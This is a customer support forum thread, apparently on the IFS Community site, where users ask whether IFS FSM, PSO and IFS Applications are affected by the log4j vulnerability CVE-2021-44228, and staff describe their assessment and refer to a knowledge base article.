Are any of the IFS FSM components (mainly the IFS FSM android application) impacted by the log4j vulnerability CVE-2021-44228?
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
+11Hi
This is to inform you that IFS R&D Team is assessing whether the vulnerability is affecting IFS Application/FSM /PSO /EOI and based on that IFS R&D will recommend a corrective action.
We'll keep you updated on this.
Best Regards,
Shani
Shani Fernando - www.linkedin.com/in/shanifernando
+1Is there an update on this? I need to know if the IFS Application is affected and the recommended corrective action.
1 person likes this
+18FSM does not use Apache as a web server, it is a Windows IIS app. The description of the vulnerability says “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.” - we don’t use direct LDAP access. So I don’t believe FSM is affected, but we’ll dig into it a bit more and confirm.
+1Jon Reid wrote:
FSM does not use Apache as a web server, it is a Windows IIS app. The description of the vulnerability says “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.” - we don’t use direct LDAP access. So I don’t believe FSM is affected, but we’ll dig into it a bit more and confirm.
We personally use the IFS 9 application which is java based. I only responded to this question and not starting my own because Shani above mentioned that the R&D team is looking into the Application/FSM /PSO /EOI and would provide an update. I was looking for an update on it specifically the Application.
1 person likes this
+18The reported vulnerability cites log4j being used with JNDI (Java Naming and Directory Interface) to access LDAP.
I don’t see any references to log4j or JNDI when browsing the FSMa (Mobile Android) code repository in Bitbucket.
Will still follow up with Mobile team to confirm.
Hi, we have customers which still running IFS 8 SP1(Foundation1 SP2) version with old Log4j, they are check whether IFS will release some patch regarding this.
https://vulners.com/github/GHSA-JFH8-C2JP-5V3Q
Plesae update this, thank you!
1 person likes this
+18This question was originally about the FSM product and the FSM Mobile client. I cannot supply any answer about IFS Applications 8 or 9 - that should be its own separate topic
1 person likes this
+24Please subscribe to this KBA which will be updated every 24 hours
+4Hi
Noted that FSM & PSO was not affected by CVE-2021-44228. ( Impact of CVE-2021-44228 on IFS Products, Services | IFS Community)
But I want to know any log 4j is used by FSM or PSO? If yes what is the version
Thanks
Oshan
Reply
Enter your E-mail address. We'll send you an e-mail with instructions to reset your password.